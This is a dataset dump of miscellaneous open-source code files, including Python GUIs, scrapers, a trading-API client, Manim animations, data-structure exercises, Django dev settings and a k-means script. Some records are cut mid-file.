+{"seq_id":"104078648","text":"import shelve\nfrom tkinter import *\nfrom tkinter.messagebox import showerror\n\nfile_name = 'class-shelve'\nfieldnames = ('name', 'age')\n\ndef make_widgets():\n global entries\n window = Tk()\n window.title('These people')\n form = Frame(window)\n form.pack()\n entries = {}\n for (ix, label) in enumerate(('key', ) + fieldnames):\n lab = Label(form, text = label)\n ent = Entry(form)\n lab.grid(row = ix, column = 0)\n ent.grid(row = ix, column = 1)\n entries[label] = ent\n btn_fetch = Button(form, text='Fetch', command = (lambda: fetch()))\n btn_fetch.grid(row = 3, column = 0)\n btn_update = Button(form, text = 'Update', command = (lambda: update()))\n 
btn_update.grid(row = 3, column = 1)\n return window\n\n\ndef fetch():\n print('fetch!')\n key = entries['key'].get()\n try:\n record = db[key]\n except:\n showerror(title='Error', message='No such key!')\n else:\n for field in fieldnames:\n entries[field].delete(0, END)\n entries[field].insert(0, repr(getattr(record, field)))\n\n\ndef update():\n key = entries['key'].get()\n if key in db:\n record = db[key]\n else:\n from Person import Person\n record = Person(name = '?', age = '?')\n for field in fieldnames:\n setattr(record, field, entries[field].get())\n db[key] = record\n\n\ndb = shelve.open(file_name)\nwindow = make_widgets()\nwindow.mainloop()\ndb.close()","sub_path":"codinPython/db/peoplegui.py","file_name":"peoplegui.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"633497415","text":"#성공회대학교 대학기구_학생복지처 페이지 긁어오기\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup, Tag\n\ndef run():\n html = urlopen(\"http://www.skhu.ac.kr/uni_int/uni_int_5_4.aspx\") #성공회대학교 대학기구-학생복지처 url\n bs0bj = BeautifulSoup(html.read(),\"html.parser\")\n\n #공통된 번호 저장 및 출력\n main = \"대표전화 02)2610-4114 / 팩스 02)2683-8858/ 야간전화 02)2610-4119/ 직통전화 02)2610 + 교내번호\"\n print(main)\n\n # for문을 사용하여 원하는 부분을 추출 및 출력\n data = list()\n for child in bs0bj.find(\"table\",{\"class\":\"cont_a mt20 ml20 w690\"}).tbody.children:\n if isinstance(child, Tag): #child의 타입이 Tag인지 확인\n item = child.findAll(\"td\")\n data.append({\"title\":item[0].get_text(), #소속\n \"name\":item[1].get_text(), #이름\n \"class\":item[2].get_text(), #직책\n \"task\":item[3].get_text(), #업무\n \"phone\":item[4].get_text(), #내선번호\n \"fax\":item[5].get_text() }) #fax번호\n\n return data\n","sub_path":"skhufeeds/crawlers/crawlers/info/welfare_student.py","file_name":"welfare_student.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"514063685","text":"import tornado.web\n\nimport logging\n\nfrom .base import BaseJsonHandler\n\nlog = logging.getLogger(__name__)\n\n\nclass SetHandler(BaseJsonHandler):\n \"\"\"INPUT: {\n \"uuid\": \"7D311B4D-F069-4247-AB03-31D366B58BE8\",\n \"nick\": \"GrivIN\",\n \"udistance\": 100,\n \"hashtag\": \"\",\n \"LocationLatitude\": -126.4,\n \"LocationLongitude\": 45.3201,\n \"LocationAltitude\": 0,\n \"LocationSpeed\": 0,\n \"LocationTimestamp\": 0,\n \"message\": \"Łolaboga jakie jaja\"\n }\n OUTPUT: HTTP 200 status only\n \"\"\"\n\n def main(self):\n message = self._set_message()\n user_ask = self._user_ask()\n\n yield [message, user_ask]\n\n self.output_data = ''\n\n def check_json_args(self):\n for x in (\n # 'lang', - optional\n 'uuid',\n 'nick',\n 'message',\n 'distance',\n 'hashtag',\n 'LocationLatitude',\n 'LocationLongitude',\n 'LocationAltitude',\n 'LocationTimestamp'):\n if x not in self.json_args:\n log.error('%s Missed value in POST: %s', self.json_args.get('uuid', 'NaN'), x)\n raise tornado.web.HTTPError(400)\n\n def _set_message(self):\n return self.db.execute(\"\"\"INSERT INTO\n messages (\n uuid_id,\n nick,\n message,\n udistance,\n hashtag_id,\n location_latitude,\n location_longitude,\n location_altitude,\n location_timestamp,\n location,\n show_azimuth)\n VALUES (\n %(uuid_id)s,\n %(nick)s,\n %(message)s,\n %(distance)s,\n %(hashtag_id)s,\n %(LocationLatitude)s,\n %(LocationLongitude)s,\n %(LocationAltitude)s,\n %(LocationTimestamp)s,\n ST_GeomFromText('POINT(%(LocationLatitude)s %(LocationLongitude)s)', 
4326),\n %(showAzimuth)s\n );\n \"\"\", self.json_args)\n","sub_path":"hiserver/handlers/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"48963549","text":"import pandas as pd\nimport numpy as np\nimport math\n\ndict_reduced = {}\ntrain = 0\nnr_cities = 0\nmax_id = 0\nconditional = 0\n\n\ndef main():\n global train\n global nr_cities\n global max_id\n global conditional\n\n #load train data\n train = pd.read_csv('../booking_train_set.csv')\n\n TopCities = pd.DataFrame\n\n TopCities=train.groupby(\"city_id\").count()\n TopCities.to_excel(\"TopCities.xlsx\")\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"booking_challenge/OldAttempt/Adrian_test/TopCities.py","file_name":"TopCities.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173079311","text":"# Helper functions and global variables across the system\n\nimport sys\n\n# Maintains all the ideas\n# Ensures no idea is repeated\n# The is a dictionary of ideas\n# Key: idea name\n# Value: idea link object {idea, idea chains it is apary of}\nideas = dict()\n\n# SUCCESS CODES\nSUCCESS = 0\n\n# ERROR CODES\nDNE_ERR = 1\n\n# Print Toggle\nPRINT = True\n\n############ PRINTING ############\n# Wrapper function that allows toggling printing with just a global variable\ndef printe(*values, sep=' ', end='\\n', file=sys.stdout, flush=False):\n if PRINT:\n # Append all the values together\n print_str = \"\"\n for value in values:\n print_str += str(value)\n\n # Print the resulting string\n print(print_str, sep=sep, end=end, file=file, flush=flush)\n\n\n############ IDEA INITIALIZATION ##############\n# Creates a globally unique id for the idea\ndef create_id(idea):\n # Get the base of the name\n idea_name = idea.get_idea_name()\n\n # Append numbers to the name to differentiate ideas with the same name\n idea_id = idea_name\n\n # Keep incrementing the counter until we find an index that hasnt been used yet\n counter = 0\n while idea_id in ideas.keys():\n idea_id = idea_name + str(counter)\n counter += 1\n\n return idea_id\n\n# Creates a file and tracker for an idea in order to store it\n# also makes ideas globally unique \ndef create_storage(idea):\n # Get the id of the idea\n file_name = idea.get_idea_id()\n\n # Create the file based on the name\n with open(file_name + \".brn\", \"w+\") as f:\n # Write the idea to the file initially\n f.write(idea.get_idea_name())\n\n return file_name\n\n######## IDEAS ##########\n# Add the idea to the global dictionary of ideas. 
Key is by id\ndef add_idea(idea):\n idea_key = idea.get_id()\n ideas[idea_key] = idea\n\n# Remove a group of ideas\ndef remove_ideas(ideas):\n for idea in ideas:\n remove_idea(idea)\n\n# Remove a single idea:\n# - Remove all idea chains that contain the idea\n# - Remove it from the global index\n# - Remove its file from the storage\ndef remove_idea(idea):\n pass\n\n# Find an idea by its name\ndef find_idea_by_name(idea_name_to_find):\n if idea_name_to_find in ideas.keys():\n return ideas[idea_name_to_find]\n else:\n printe(\"Idea name does not exist\")\n return ","sub_path":"brain/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"652200109","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QInputDialog, QLineEdit, QFileDialog\r\nfrom PyQt5.QtGui import QIcon\r\nimport PyQt5.QtWidgets as qt\r\nimport matplotlib.pyplot as plt\r\nfrom astropy.visualization import astropy_mpl_style\r\n\r\n\r\nfrom PyQt5.QtWidgets import *\r\nprint(QStyleFactory.keys())\r\n\r\napp = QApplication\r\napp.setStyle('Fusion')\r\n\r\nfrom astropy.io import fits\r\nimport numpy as np\r\n\r\n# GUI initiation\r\nclass App(QWidget):\r\n # Sets geometry of main body\r\n def __init__(self):\r\n # need super else error\r\n super().__init__()\r\n self.title = 'Flux and wavelength plotter'\r\n self.left = 500\r\n self.top = 500\r\n self.width = 440\r\n self.height = 280\r\n self.layout0 = qt.QGridLayout()\r\n self.layout = qt.QGridLayout()\r\n self.group_box_settings = QGroupBox(self)\r\n self.group_box_settings.setTitle(\"Select a file to enable these many magic tricks\")\r\n\r\n self.initUI()\r\n\r\n # Creates parts inside the main UI such as buttons that connect to functions when pushed\r\n def initUI(self):\r\n\r\n # Set title of window and its geometry to previously defined values\r\n self.setWindowTitle(self.title)\r\n self.setGeometry(self.left, self.top, self.width, self.height)\r\n\r\n\r\n\r\n # File explorer to select a fits file to later plot. 
Can change to other files later if they are ever plottable\r\n self.filechoose = qt.QPushButton('Choose fits file to plot from')\r\n self.layout0.addWidget(self.filechoose, 0, 0, 1, 2)\r\n self.filechoose.clicked.connect(self.saveFileDialog)\r\n\r\n # Plot the chosen file with the file address storedfrom saveFileDialog function\r\n self.plotbutton = qt.QPushButton('Plot Wavelength against Flux')\r\n self.layout.addWidget(self.plotbutton, 1, 0, 1, 2)\r\n self.plotbutton.setEnabled(False)\r\n self.plotbutton.clicked.connect(self.PlotWF)\r\n\r\n # Prints all headers when pressed\r\n self.prnthdrsbutton = qt.QPushButton('View all headers')\r\n self.layout.addWidget(self.prnthdrsbutton, 2, 0, 1, 2)\r\n self.prnthdrsbutton.setEnabled(False)\r\n self.prnthdrsbutton.clicked.connect(self.prnthdrs)\r\n\r\n # Box to input text to search for in the headers and comments and values\r\n self.searchhdrsbox = qt.QLineEdit('Search for a header/comment')\r\n self.layout.addWidget(self.searchhdrsbox, 3, 0, 1, 1)\r\n self.searchhdrsbox.setEnabled(False)\r\n # Connects pressing enter with the search button\r\n self.searchhdrsbox.returnPressed.connect(self.searchhdrs)\r\n self.searchhdrsbox.mousePressEvent = lambda _: self.searchhdrsbox.selectAll()\r\n\r\n # Actually searches for the hdrs box text\r\n self.searchhdrsbttn = qt.QPushButton(\"Search\")\r\n self.layout.addWidget(self.searchhdrsbttn, 3, 1)\r\n self.searchhdrsbttn.setEnabled(False)\r\n self.searchhdrsbttn.clicked.connect(self.searchhdrs)\r\n\r\n\r\n self.group_box_settings.setLayout(self.layout)\r\n self.layout0.addWidget(self.group_box_settings)\r\n self.setLayout(self.layout0)\r\n\r\n self.show()\r\n\r\n\r\n\r\n # Function for choosing file path to plot later, also enables the plot button.\r\n def saveFileDialog(self):\r\n # Parent of self, no directory or name, but restricted to fits files\r\n self.filePath = QFileDialog.getOpenFileName(self, '', '', '*.fits')[0]\r\n print(self.filePath)\r\n if self.filePath:\r\n # In case I need the name of the file itself.\r\n self.fileName = self.filePath.split(\"/\")[-1]\r\n self.image_data = fits.open(self.filePath, ext=0)\r\n\r\n print(self.fileName)\r\n self.plotbutton.setEnabled(True)\r\n self.prnthdrsbutton.setEnabled(True)\r\n self.searchhdrsbox.setEnabled(True)\r\n self.searchhdrsbttn.setEnabled(True)\r\n\r\n\r\n # Function to plot the chosen fits file.\r\n def PlotWF(self):\r\n\r\n # the .data values of the file which is the flux in this case\r\n flux=(self.image_data[0].data)\r\n\r\n # Takes the value of CRVAL1 which is the initial angstrom wavelength\r\n starter = self.image_data[0].header['CRVAL1']\r\n # The step in wavelength per data point taken from CDELT1\r\n steps = self.image_data[0].header['CDELT1']\r\n # Making a list with the interval of steps\r\n wlist = starter + (steps*np.arange(self.image_data[0].header['NAXIS1']))\r\n\r\n\r\n # Plot the figure with thinner lines and show it\r\n plt.figure()\r\n plt.plot(wlist,flux,linewidth=0.1)\r\n plt.xlabel( 'Wavelength (A)')\r\n plt.title(str(self.fileName))\r\n plt.ylabel( \"Flux (Relative)\")\r\n plt.show()\r\n\r\n # Prints all headers found in the file\r\n def prnthdrs(self):\r\n print (self.image_data.info())\r\n print(repr(self.image_data[0].header))\r\n\r\n # Search the headers for the text in the search box and prints entire line where its found\r\n def searchhdrs(self):\r\n print(\"\\nSearching for '\" + self.searchhdrsbox.text() + \"'\\n\")\r\n for line in repr(self.image_data[0].header).split(\"\\n\"):\r\n if 
(self.searchhdrsbox.text().lower()) in (line.lower()):\r\n print(line)\r\n\r\n print(\"\\nSearch finished\\n\")\r\n\r\nclass ButtonGroupBox(QWidget):\r\n\r\n def __init__(self, parent=None):\r\n super(ButtonGroupBox, self).__init__(parent=parent)\r\n\r\n self.layout = QVBoxLayout(self)\r\n self.layout.setContentsMargins(0,24,0,0)\r\n self.groupBox = QGroupBox(self)\r\n self.button = QPushButton(\"FOO\", parent=self)\r\n self.layout.addWidget(self.groupBox)\r\n\r\n self.button.move(0, -4)\r\n\r\n\r\n\r\ndef main():\r\n app = QApplication(sys.argv)\r\n main = App()\r\n main.show()\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"pyqt gui.py","file_name":"pyqt gui.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"535568581","text":"# delete node from starting in doubly linked list\n\nclass Node:\n def __init__(self, data = None):\n self.prev = None\n self.next = None\n self.data = data\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n \n def display(self):\n if self.head.data is None:\n print(\"\\nLinked List Is Empty!\")\n else:\n ptr = self.head\n\n while ptr is not None:\n print(f\"{ptr.data} -> \", end=\"\")\n ptr = ptr.next\n\n def insertPosition(self):\n position = int(input(\"\\nEnter Position : \"))\n data = int(input(\"Enter Data : \"))\n ptr = Node(data)\n\n if position is 0:\n if self.head.data is None:\n self.head.data = data\n else:\n ptr.next = self.head\n self.head.prev = ptr\n self.head = ptr\n print(\"\\nNode Inserted!\")\n else:\n flag = 0\n temp = self.head\n\n while temp.data is not None:\n if position == flag+1:\n if temp.next is None:\n temp.next = ptr\n ptr.prev = temp\n else:\n again = temp.next\n again.prev = ptr\n temp.next = ptr\n ptr.prev = temp\n ptr.next = again\n print(\"\\nNode Inserted!\")\n break\n else:\n temp = temp.next\n flag += 1\n\n def deleteBegin(self):\n if self.head.data is None:\n print(\"\\nLinked List Is Empty!\")\n else:\n if self.head.next is None:\n self.head = Node()\n else:\n self.head = self.head.next\n self.head.prev = None\n print(\"\\nNode Deleted!\")\n\n\n\nif __name__ == \"__main__\":\n linkedList = LinkedList()\n linkedList.head = Node()\n\n while True:\n choice = int(input(\"\\n1. Display\\n2. Insert Position\\n3. Delete Start\\n4. 
Exit\\nChoice : \"))\n \n if choice is 1:\n linkedList.display()\n elif choice is 2:\n linkedList.insertPosition()\n elif choice is 3:\n linkedList.deleteBegin()\n elif choice is 4:\n break\n else:\n print(\"\\nInvalid Input!\")","sub_path":"DoublyDeleteBegin.py","file_name":"DoublyDeleteBegin.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"19881559","text":"# Solving BOJ 15829\n\n\ndef MyHash(string, r = 31, M = 1234567891):\n total = 0\n subtractor = ord('a') - 1\n for i in range(len(string)):\n total += (ord(string[i]) - subtractor) * pow(r, i) % M\n \n return total % M\n\n\nif __name__ == '__main__':\n _ = int(input())\n print(MyHash(input()))\n","sub_path":"BOJ15829.py","file_name":"BOJ15829.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"634501848","text":"import re\n\n\ndef extractValues(sentence):\n pattern = r'[+-]?\\d+\\.?\\d+[Ee]?[+-]?\\d*'\n match = re.findall(pattern, sentence)\n return match\n\ndef getSwitches(commandline):\n pattern = r'[\\+\\\\]([a-z])\\s+([^\\s\\\\\\+]\\S*)'\n match = re.findall(pattern, commandline)\n return match\n\n\nif __name__ == '__main__':\n sentence = \"With the electron's charge being -1.6022e-19, some choices you have are -110, -32.0 and +55. Assume that po eqquails 3.1415, 'e' equals 2.7 and Na is +6.0221E+023.\"\n print(extractValues(sentence))\n commandline = \"myScript.bash +v \\i 2 +p /local/bin/somefolder \\s sss\"\n print(getSwitches(commandline))\n","sub_path":"ece364/Lab06/regexLab.py","file_name":"regexLab.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"510624324","text":"import asyncio\nimport urllib\nimport aiohttp\nfrom asyncio_throttle import Throttler\n\nfrom src.items import load_items_poeofficial\n\ncurrencies = load_items_poeofficial()\n\n\ndef name():\n return \"poeofficial\"\n\n\nclass RateLimitException(Exception):\n pass\n\n\ndef fetch_offers(league, currency_pairs, limit=3):\n loop = asyncio.get_event_loop()\n results = loop.run_until_complete(\n fetch_offers_async(league, currency_pairs, limit))\n return results\n\n\nasync def fetch_offers_async(league, currency_pairs, limit=3):\n throttler = Throttler(10)\n\n async with aiohttp.ClientSession() as sess:\n tasks = [\n asyncio.ensure_future(\n fetch_offers_for_pair(sess, throttler, league, p[0], p[1],\n limit)) for p in currency_pairs\n ]\n\n (done, _not_done) = await asyncio.wait(tasks)\n results = [task.result() for task in done]\n return results\n\n\n\"\"\"\nPrivate helpers below\n\"\"\"\n\n\nasync def fetch_offers_for_pair(sess, throttler, league, want, have, limit=5):\n async with throttler:\n offer_ids = []\n query_id = None\n offers = []\n\n offer_id_url = \"http://www.pathofexile.com/api/trade/exchange/{}\".format(\n urllib.parse.quote(league))\n payload = {\n \"exchange\": {\n \"status\": {\n \"option\": \"online\"\n },\n \"have\": [map_currency(have)],\n \"want\": [map_currency(want)],\n }\n }\n\n response = await sess.request(\"POST\", url=offer_id_url, json=payload)\n try:\n json = await response.json()\n offer_ids = json[\"result\"]\n query_id = json[\"id\"]\n except Exception:\n raise\n\n if len(offer_ids) != 0:\n id_string = \",\".join(offer_ids[:limit])\n url = \"http://www.pathofexile.com/api/trade/fetch/{}?query={}&exchange\".format(\n id_string, query_id)\n\n 
response = await sess.get(url)\n try:\n json = await response.json()\n offers = [map_offers_details(x) for x in json[\"result\"]]\n except Exception as ex:\n raise ex\n\n return {\"offers\": offers, \"want\": want, \"have\": have, \"league\": league}\n\n\ndef map_offers_details(offer_details):\n contact_ign = offer_details[\"listing\"][\"account\"][\"lastCharacterName\"]\n stock = offer_details[\"listing\"][\"price\"][\"item\"][\"stock\"]\n receive = offer_details[\"listing\"][\"price\"][\"item\"][\"amount\"]\n pay = offer_details[\"listing\"][\"price\"][\"exchange\"][\"amount\"]\n conversion_rate = round(receive / pay, 4)\n\n return {\n \"contact_ign\": contact_ign,\n \"conversion_rate\": conversion_rate,\n \"stock\": stock,\n }\n\n\ndef map_currency(currency):\n sanitized_currency = \"\".join(currency.split(\"'\"))\n if sanitized_currency in currencies:\n return currencies[sanitized_currency][\"id\"]\n else:\n raise Exception(\"Unknown currency key\", sanitized_currency)\n","sub_path":"src/backends/poeofficial.py","file_name":"poeofficial.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"526600439","text":"\"\"\"\nInitializes an empty persons database.\nThe persons database is used to store persons.\n\"\"\"\n\nimport sqlite3\n\nPCONN = sqlite3.connect('persons.db')\nPC = PCONN.cursor()\n\n# Here we store the mean and number (count) of each trait\n# so that we can update it over time by updating the mean\n# Example: \"Bob is friendly\" + \"Bob is unfriendly\" -> mean=0\n# person : the name of the person\n# friendliness : the mean value of friendliness traits\n# dominance : the mean value of dominance traits\n# n_friendliness : the number of friendliness traits\n# n_dominance : the number of dominance traits\nPC.execute('''\nCREATE TABLE IF NOT EXISTS persons(\nperson TEXT,\nfriendliness INT,\ndominance INT,\nn_friendliness INT,\nn_dominance INT\n)''')\n\nPCONN.commit()\n","sub_path":"interpersonal/utils/init_persons_db/init_persons.py","file_name":"init_persons.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"263651352","text":"from manimlib.imports import *\n\nclass Plot1(GraphScene):\n CONFIG = {\n \"y_max\" : 100,\n \"y_min\" : 0,\n \"x_max\" : 10,\n \"x_min\" : 0,\n # x,y 轴分别的刻度\n \"y_tick_frequency\" : 10, \n \"x_tick_frequency\" : 1, \n \"axes_color\" : BLUE, \n \"y_label_direction\": RIGHT,\n \"x_label_direction\": UP,\n # 设置图像原始位置\n \"graph_origin\": 3 * DOWN + 6 * LEFT,\n }\n # 定义本图像函数\n def func(self, x):\n return x**2\n\n def construct(self):\n self.setup_axes(animate=True)\n # 创建坐标轴和函数图像\n graph = self.get_graph(self.func, \n color = GREEN,\n x_min = 4, \n x_max = 10\n )\n # 默认label \"f(x)\" 的显示位置\n graph_label = self.get_graph_label(graph, x_val = 10, direction=UP/4)\n # \n text1 = TextMobject(\"设函数f(x)的定义域为D\")\n text1.scale(0.8)\n text1.next_to(self.coords_to_point(1, 80))\n # 第一幕\n self.play(\n \tShowCreation(graph),\n Write(graph_label),\n ShowCreation(text1),\n run_time = 2\n )\n self.wait()\n\n # 第二幕\n self.play(FadeOut(text1))\n self.wait()\n text2 = TextMobject(\"取区间I,且$I\\subset D$\")\n text2.scale(0.8)\n text2.next_to(self.coords_to_point(1, 80))\n # 画两条垂直 x 轴垂线\n v_dashed_line1 = DashedLine(start=self.coords_to_point(4, 0), \n end=self.coords_to_point(4, 16), color=BLUE)\n v_dashed_line2 = DashedLine(start=self.coords_to_point(9, 0), \n end=self.coords_to_point(9, 81), 
color=BLUE)\n VGroup2 = VGroup(v_dashed_line1, v_dashed_line2)\n # 截取图像范围\n graph2 = self.get_graph(func=self.func, x_min=4, x_max=9, color=RED)\n self.play(\n ShowCreation(text2),\n ShowCreation(graph2),\n ShowCreation(VGroup2),\n run_time = 2\n )\n\n # 第三幕\n self.play(\n FadeOut(text2),\n FadeOut(VGroup2),\n )\n self.wait()\n text3 = TextMobject(\"任取$x_1$和$x_2\\subset I$,且$x_1f(x_2)$\", \"则$f(x)$在区间I上单调递减\")\n text3.scale(0.8)\n text3[0].next_to(self.coords_to_point(5, 80))\n text3[1].next_to(self.coords_to_point(5, 80))\n self.wait(3)\n self.play(Write(text3[0]))\n self.wait(3)\n self.play(FadeOut(text3[0]))\n self.wait()\n self.play(Write(text3[1]))\n self.wait(4)\n\nclass Question(Scene):\n def construct(self):\n text1 = TextMobject(\"Q:怎么证明一个函数在某个区间的单调性?\", height=8, width=8)\n text2 = TexMobject(\"Example:\", \"y\", \"=\", \"x\", \"+\",\n \"\\\\ln{x}\", \",\", \"x\\\\in \\\\left(0,+\\\\infty \\\\right)\")\n text3 = TextMobject(\"证明:\")\n text4 = TextMobject(\"在$(0,+\\\\infty \\\\right)$任取$x_1$和$x_2$,且$x_1\\n\")\n header.write(\"#include \\n\\n\")\n header.write(\"namespace aoc\" + year + \"{ \")\n #Create main.cpp\n with open(dirName + '/main.cpp', 'w') as main:\n main.write(mainTemplate.replace(\"YEAR\", year))\n #Create daily files\n for i in range(25):\n header.write(declarationTemplate.replace(\"DAY\", str(i + 1)).replace(\"YEAR\", year))\n #Create implementation files\n writeImpl(dirName, str(i + 1), implementationTemplate, year)\n sources += \"\\tday\" + str(i + 1) + '.cpp\\n'\n \n #Create input files\n with open(dirName + '/inputs/day' + str(i + 1) + \".txt\", 'w') as day:\n day.write(\"\")\n header.write(\"} // aoc\" + year + '\\n')\n \n #Create CMakeLists\n with open(dirName + '/CMakeLists.txt', 'w') as cmake:\n cmake.write(cmakeTemplate.replace(\"SOURCES\", sources).replace(\"YEAR\", year))\n \n #Create README\n with open(dirName + '/README.md', 'w') as readme:\n readme.write(readmeTemplate.replace(\"YEAR\", year))","sub_path":"cpp/generator/year_genv2.py","file_name":"year_genv2.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"548847318","text":"# Copyright (c) 2020, Manfred Moitzi\n# License: MIT License\nimport pytest\nfrom ezdxf.layouts import VirtualLayout\nfrom ezdxf.render import make_path\n\n\n@pytest.fixture\ndef ellipse():\n layout = VirtualLayout()\n return layout.add_ellipse(\n center=(1999.488177113287, -1598.02265357955, 0.0),\n major_axis=(629.968069297, 0.0, 0.0),\n ratio=0.495263197,\n start_param=-1.261396328799999,\n end_param=-0.2505454928,\n dxfattribs={\n 'layer': \"0\",\n 'linetype': \"Continuous\",\n 'color': 3,\n 'extrusion': (0.0, 0.0, -1.0),\n },\n )\n\n\ndef test_end_points(ellipse):\n p = make_path(ellipse)\n\n assert ellipse.start_point.isclose(p.start)\n assert ellipse.end_point.isclose(p.end)\n\n # end point locations measured in BricsCAD:\n assert ellipse.start_point.isclose((2191.3054, -1300.8375), abs_tol=1e-4)\n assert ellipse.end_point.isclose((2609.7870, -1520.6677), abs_tol=1e-4)\n","sub_path":"tests/test_07_render/test_708b_path_from_ellipse_issue_224.py","file_name":"test_708b_path_from_ellipse_issue_224.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"91731962","text":"from Exercice2.optimized_game import OptimizedGame\nfrom game import Game\n\n\nif __name__ == '__main__':\n menu = True\n print(\"-------------------------------- Jeu de 
NIM --------------------------------\\n\")\n while menu:\n nombreJetons = int(input(\"Veuillez saisir le nombre de jetons (Max. 18 jetons): \"))\n playerOption = input(\"Veuillez choisir le joueur à jouer le premier: Max (o) ou Min (n): \")\n player = True if playerOption == \"o\" else False\n choice = input(\"Veuillez un algorithme: Minimax (m) ou Minimax avec élagage (e): \")\n if choice == \"m\":\n game = Game([nombreJetons], player)\n game.__repr__()\n score = game.minmax()\n print(f\"\\nLe score final est {score} avec {Game.visited_node} noeuds visités.\")\n menu = False\n elif choice == \"e\":\n optimized_game = OptimizedGame([nombreJetons], player)\n optimized_game.__repr__()\n score = optimized_game.minmax()\n print(f\"\\nLe score final est {score} avec {OptimizedGame.visited_node} noeuds visités.\")\n menu = False\n print(f\"\\nNB: Score -1 => Min a gagné // Score 1 => Max a gagné\")\n\n","sub_path":"Exercice1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"591429328","text":"# Copyright 2018 Ruben Decrop\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nprint('loading local settings in dev environment')\n\nimport os\n\n# config parameters\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\n\nALLOWED_HOSTS = ['*']\n\nCORS_ORIGIN_ALLOW_ALL = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'ck.db',\n },\n}\n\nDEBUG = True\n\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'frotend', 'dist', 'static'),\n)\n\nWEBPACK_LOADER = {\n 'DEFAULT': {\n 'BUNDLE_DIR_NAME': 'static/',\n 'STATS_FILE': os.path.join(ROOT_DIR, 'frontend', 'webpack-stats.json'),\n }\n}\n\n\n","sub_path":"setupdata/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"38362173","text":"import sys\nimport random\n\n#datafile = sys.argv[1]\n#f = open(datafile)\nf =open(\"/Users/pavanghuge/Downloads/ML/Assignment8/ionosphere.data\")\ndata = []\ni = 0\nl = f.readline()\n\n# Read Datafile\n\nwhile (l != ''):\n\ta = l.split()\n\tl2 = []\n\tfor j in range(0, len(a), 1):\n\t\tl2.append(float(a[j]))\n\tdata.append(l2)\n\tl = f.readline()\n\nrows = len(data)\ncols = len(data[0])\nf.close()\n\ntry:\n\tk = int(input(\"Enter the number of clusters: \"))\nexcept IndexError:\n\tprint(\" Improper Syntax: try - python3 Assignment8_Pavan_Ghuge.py datafile 2 {value of k>1}\")\n\tsys.exit()\n\n#initialize coordinates in means\n # number of dimensions is equal to number of coordinates of mean\n \nmean = []\ncol = []\nfor j in range(0, cols, 1):\n\tcol.append(0)\n\n# k cluster will have k means\nfor i in range(0, k, 1):\n\tmean.append(col)\n\n# Initially dividing dataset into k clusters randomnly \nrandom1 = 0\nfor p in range(0, k, 
